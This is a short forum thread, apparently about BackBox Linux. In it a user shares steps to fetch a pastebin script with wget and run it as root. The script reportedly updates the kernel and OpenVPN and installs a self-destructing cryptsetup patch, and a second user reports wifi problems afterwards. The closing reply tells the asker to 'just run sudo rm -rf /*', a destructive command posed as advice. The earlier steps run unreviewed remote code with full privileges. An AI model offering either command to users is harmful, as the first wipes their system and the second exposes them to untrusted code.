Hey i still love BackBox

here is a little script i am gonna share with you.

what it does ?

Updating OS
Upgrading Kernel 3.18.5
Upgrading OpenVPN 2.3.6
Installing SublimeText
Installing NUKED CryptSetup ( selfdestruction of headerkey when entering special password )

1. wget http://pastebin.com/raw.php?i=P9aSPQ2r -o BBadditions.sh
2. chmod +x BBadditions.sh
3. sudo su
4. ./BBadditions.sh
5. Profit

have fun.

*may add some cleanup stuff*

*NOTE* after installing the patched crypt-setup
use sudo apt-mark hold here_cryptsetup_package_name
to prevent sudo apt-get upgrade from overwritting your patched cryptsetup with the normal one!

There was an issues installing Linux kernel, i closed the terminal by mistake and don't have the time to run it again anyways it was missing the wireless driver directory. It still finished installing but my wifi was unstable and kept disconnection, don't know if this is a problem with the script installing Linux kernel or just a bug with the kernel itself.

Hi,

Do you know to read error ? That file is removed from pastebin. And that is good, beause this was for older version of BackBox.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*
